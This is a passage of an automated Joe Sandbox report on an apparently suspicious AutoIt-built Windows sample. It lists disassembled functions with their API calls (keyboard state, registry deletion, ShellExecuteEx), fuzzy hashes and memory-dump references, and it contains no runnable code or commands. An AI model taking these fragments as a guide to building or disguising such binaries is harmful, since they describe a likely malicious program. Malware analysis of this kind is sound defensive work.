                                                        Similarity
                                                        • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                        • String ID:
                                                        • API String ID: 3480843537-0
                                                        • Opcode ID: 1a2616049df22e490eb8f92059aff48710bfd53227f7ca40d89e676ff3362916
                                                        • Instruction ID: 5963bf0312d04e4ae71512dae78bd12154d3f8dceaa7f633a3f6989c807ac699
                                                        • Opcode Fuzzy Hash: 1a2616049df22e490eb8f92059aff48710bfd53227f7ca40d89e676ff3362916
                                                        • Instruction Fuzzy Hash: 1D81E171508200AFC724EF64DC85E6BB7E8EF85714F105A2DF955AB2A2EB30DD05CB92
                                                        APIs
                                                        • __mtinitlocknum.LIBCMT ref: 00E6A991
                                                          • Part of subcall function 00E67D7C: __FF_MSGBANNER.LIBCMT ref: 00E67D91
                                                          • Part of subcall function 00E67D7C: __NMSG_WRITE.LIBCMT ref: 00E67D98
                                                          • Part of subcall function 00E67D7C: __malloc_crt.LIBCMT ref: 00E67DB8
                                                        • __lock.LIBCMT ref: 00E6A9A4
                                                        • __lock.LIBCMT ref: 00E6A9F0
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00EF6DE0,00000018,00E75E7B,?,00000000,00000109), ref: 00E6AA0C
                                                        • EnterCriticalSection.KERNEL32(8000000C,00EF6DE0,00000018,00E75E7B,?,00000000,00000109), ref: 00E6AA29
                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00E6AA39
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1422805418-0
                                                        • Opcode ID: 7720fe5a4b02f6cb5cc38dbdecb9658d1930c66b8246f620e1848963ce33112b
                                                        • Instruction ID: 85a6785752da6837aa794abaffc3559ce9cb54847f7b91b1243327f2c30ebad3
                                                        • Opcode Fuzzy Hash: 7720fe5a4b02f6cb5cc38dbdecb9658d1930c66b8246f620e1848963ce33112b
                                                        • Instruction Fuzzy Hash: FC412971D802059BEB149FA8EA44758B7B0BF013B8F18633AE525BB2D1DB749841CF91
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00EA8EE4
                                                        • GetDC.USER32(00000000), ref: 00EA8EEC
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EA8EF7
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00EA8F03
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00EA8F3F
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EA8F50
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00EA8F8A
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EA8FAA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: 4949dd361e49230394efb6dca15914483406ec145fccff09b815b43d40f62221
                                                        • Instruction ID: 669e6acb2870adcee7f59decf0a61e4ea22c0705bd21d9b6c6d0df7d7b25b363
                                                        • Opcode Fuzzy Hash: 4949dd361e49230394efb6dca15914483406ec145fccff09b815b43d40f62221
                                                        • Instruction Fuzzy Hash: D5319172204214BFDB108F51CC4AFEB3BAEEF4A715F044065FE09AE191C6769842CB70
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00EB016D
                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00EB038D
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EB03AB
                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00EB03D6
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EB03FF
                                                        • ShowWindow.USER32(00000003,00000000), ref: 00EB0421
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00EB0440
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                        • String ID:
                                                        • API String ID: 3356174886-0
                                                        • Opcode ID: 3968090a3f462a45dd59be20e36d59cd11708a3f400dd76d247a60237a3d17ee
                                                        • Instruction ID: 26462640e09577e7002400ff882c8c908d41ee3010e754eea9ff918108613a99
                                                        • Opcode Fuzzy Hash: 3968090a3f462a45dd59be20e36d59cd11708a3f400dd76d247a60237a3d17ee
                                                        • Instruction Fuzzy Hash: E9A19C3560061AEFDB18CF68C989BEFBBB1BB08704F049225EC54AB290D735BD51CB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78172021ba9658b5bff0f6b0d35560a9ebae14531617a7f1d199eaedeb1433a0
                                                        • Instruction ID: 80b5deef6b4fc34291730e5408ce467b7289bb3da31ca9a9f92bfd375872a524
                                                        • Opcode Fuzzy Hash: 78172021ba9658b5bff0f6b0d35560a9ebae14531617a7f1d199eaedeb1433a0
                                                        • Instruction Fuzzy Hash: 17717C70A04109EFCB04CF98CC49AEEBBB9FF85315F148669F915B6251C731AA45CB61
                                                        APIs
                                                        • _memset.LIBCMT ref: 00EA225A
                                                        • _memset.LIBCMT ref: 00EA2323
                                                        • ShellExecuteExW.SHELL32(?), ref: 00EA2368
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                          • Part of subcall function 00E5C6F4: _wcscpy.LIBCMT ref: 00E5C717
                                                        • CloseHandle.KERNEL32(00000000), ref: 00EA242F
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00EA243E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 4082843840-2766056989
                                                        • Opcode ID: a65f47198322b03100b955a0396a3ff66da114ed6ee787c401cfe7d4c13cc3ad
                                                        • Instruction ID: 94459beaef322a9027415f8b40bf2a9e23e0677ff4073b3176a84bb5c913c8a3
                                                        • Opcode Fuzzy Hash: a65f47198322b03100b955a0396a3ff66da114ed6ee787c401cfe7d4c13cc3ad
                                                        • Instruction Fuzzy Hash: E5716C70A006199FCF15EFA8D88199EBBF5FF49310F109469E956BB351CB34AD44CB90
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00E83DE7
                                                        • GetKeyboardState.USER32(?), ref: 00E83DFC
                                                        • SetKeyboardState.USER32(?), ref: 00E83E5D
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E83E8B
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E83EAA
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E83EF0
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E83F13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 7bcf23291a99a0c75395c506fad51bfb7625bc8d0cc5af5edb8944ee24cc33f9
                                                        • Instruction ID: 924e14119c35a9b06e6d16b9d05283b8c3afaed8a4e3d8bac3f16ee33b08632b
                                                        • Opcode Fuzzy Hash: 7bcf23291a99a0c75395c506fad51bfb7625bc8d0cc5af5edb8944ee24cc33f9
                                                        • Instruction Fuzzy Hash: 5B5105A0A047D53DFB3663348C05BBABEA95B06B08F086488F1DD668C3D3D99EC4D750
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00E83C02
                                                        • GetKeyboardState.USER32(?), ref: 00E83C17
                                                        • SetKeyboardState.USER32(?), ref: 00E83C78
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E83CA4
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E83CC1
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E83D05
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E83D26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: bf774561a41c21ac058e559f083edbab818264419de5dc087ff9c9af6568b2db
                                                        • Instruction ID: b0998feee060c2e9b151c063d8efcbc4295ebbb8ece25fde35853705d89a6d4d
                                                        • Opcode Fuzzy Hash: bf774561a41c21ac058e559f083edbab818264419de5dc087ff9c9af6568b2db
                                                        • Instruction Fuzzy Hash: 34511CA05047D53DFB32A734CC55BB6BF999B06B08F0CA489E0DD768C2D295EE84D760
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: a6281f0cf88739c5a532844c65f0aa4074947f9ba020c2abc3fe3f470ecbcd07
                                                        • Instruction ID: 9e18c42463ab3e14b73c02657f8966dda3825578c2bdb617c663500edde3cd86
                                                        • Opcode Fuzzy Hash: a6281f0cf88739c5a532844c65f0aa4074947f9ba020c2abc3fe3f470ecbcd07
                                                        • Instruction Fuzzy Hash: 73418D66D50214BACB11EBF4D8469CFB3ECEF04350F54A9A6E618F3261FA34E614C3A5
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00EA3DA1
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EA3DCB
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00EA3E80
                                                          • Part of subcall function 00EA3D72: RegCloseKey.ADVAPI32(?), ref: 00EA3DE8
                                                          • Part of subcall function 00EA3D72: FreeLibrary.KERNEL32(?), ref: 00EA3E3A
                                                          • Part of subcall function 00EA3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EA3E5D
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EA3E25
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: 9a2c57754efd607cc5d85d709462d572544582e05588d9028c9e3f8040c36f66
                                                        • Instruction ID: bbdb5ef70f91448ba00b52f6937e16bd1e6fab74535283221963497d2607f764
                                                        • Opcode Fuzzy Hash: 9a2c57754efd607cc5d85d709462d572544582e05588d9028c9e3f8040c36f66
                                                        • Instruction Fuzzy Hash: B63119B1901209BFDB149BA5DC85EFFB7BDEB0D304F00417AB512B6150D671AF499BA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EA8FE7
                                                        • GetWindowLongW.USER32(009CDA70,000000F0), ref: 00EA901A
                                                        • GetWindowLongW.USER32(009CDA70,000000F0), ref: 00EA904F
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EA9081
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EA90AB
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EA90BC
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EA90D6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: 0f36fc625b0cee36dd1334720921de2d344fd43b2776db2c33414ea1fb875a3a
                                                        • Instruction ID: 6231def8bbbc194d9dfd7ea27cd8442df57c5dde5b52ca47f18d8c6e95b089e5
                                                        • Opcode Fuzzy Hash: 0f36fc625b0cee36dd1334720921de2d344fd43b2776db2c33414ea1fb875a3a
                                                        • Instruction Fuzzy Hash: E73123346042199FDB218F58DC84F6437A9FB4A358F1551A4FA19AF2B2CBB2B841EB40
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E808F2
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E80918
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00E8091B
                                                        • SysAllocString.OLEAUT32(?), ref: 00E80939
                                                        • SysFreeString.OLEAUT32(?), ref: 00E80942
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00E80967
                                                        • SysAllocString.OLEAUT32(?), ref: 00E80975
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: bb9baa788309a5790b734eac3b49ff59e81340712b4e034ae8ebb50a4f60bb85
                                                        • Instruction ID: 98457423a1d372e2175823aff8459eaf0973d54ac33743cf72b396e913c4cbb4
                                                        • Opcode Fuzzy Hash: bb9baa788309a5790b734eac3b49ff59e81340712b4e034ae8ebb50a4f60bb85
                                                        • Instruction Fuzzy Hash: 9121B572605208AFEB50AF69CC88DAB73ECFB48364B008135F91DEB151D671EC498B60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: cde91881f987a0843c27a804fb3d9a7e547cfc5fbc7d299009651814e49991c0
                                                        • Instruction ID: 87489fb9f1d9229329899bd1322ee484d2ea86516a86c67d0b908e104f61cb6c
                                                        • Opcode Fuzzy Hash: cde91881f987a0843c27a804fb3d9a7e547cfc5fbc7d299009651814e49991c0
                                                        • Instruction Fuzzy Hash: 5C217C7128421177C331B7349C12FBB73D9EF64304F20642EFA4DB7182E6519942C3A1
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E809CB
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E809F1
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00E809F4
                                                        • SysAllocString.OLEAUT32 ref: 00E80A15
                                                        • SysFreeString.OLEAUT32 ref: 00E80A1E
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00E80A38
                                                        • SysAllocString.OLEAUT32(?), ref: 00E80A46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 9dba327a0dbeb0b49c2c7d3c34f424ee1d4280577587cec2cb24ce7a0928cb85
                                                        • Instruction ID: 8827320ff296896a828714371f9d91866d72bda1342e36c15117c8a40da4ef7b
                                                        • Opcode Fuzzy Hash: 9dba327a0dbeb0b49c2c7d3c34f424ee1d4280577587cec2cb24ce7a0928cb85
                                                        • Instruction Fuzzy Hash: F221A435204204AFDB14EFA9CC88CBA73ECEF493607008135F91CEB261E671EC898760
                                                        APIs
                                                          • Part of subcall function 00E5D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E5D1BA
                                                          • Part of subcall function 00E5D17C: GetStockObject.GDI32(00000011), ref: 00E5D1CE
                                                          • Part of subcall function 00E5D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E5D1D8
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EAA32D
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EAA33A
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EAA345
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EAA354
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EAA360
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: b2a252825ff2a695a583ea3228cfeb863815166e74ff60739286d35ee5d89af9
                                                        • Instruction ID: 77b8041c9424e82ece5e62eda1bae30b168a144f5a8a26fc4e5622b42b3ac501
                                                        • Opcode Fuzzy Hash: b2a252825ff2a695a583ea3228cfeb863815166e74ff60739286d35ee5d89af9
                                                        • Instruction Fuzzy Hash: 291190B115021DBEEF119F60CC85EEB7F6DFF09798F015124BA08A60A0C772AC25DBA4
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 00E5CCF6
                                                        • GetWindowRect.USER32(?,?), ref: 00E5CD37
                                                        • ScreenToClient.USER32(?,?), ref: 00E5CD5F
                                                        • GetClientRect.USER32(?,?), ref: 00E5CE8C
                                                        • GetWindowRect.USER32(?,?), ref: 00E5CEA5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Rect$Client$Window$Screen
                                                        • String ID:
                                                        • API String ID: 1296646539-0
                                                        • Opcode ID: e292a0fcc4ffd77c36c8d9fff0b1e5ec5dc54321ec301deab187e72ed1d48625
                                                        • Instruction ID: ae1a1c4e37cb30900a14fdcd8ec17a84a671031a3662b15e4c32d4734210f7c9
                                                        • Opcode Fuzzy Hash: e292a0fcc4ffd77c36c8d9fff0b1e5ec5dc54321ec301deab187e72ed1d48625
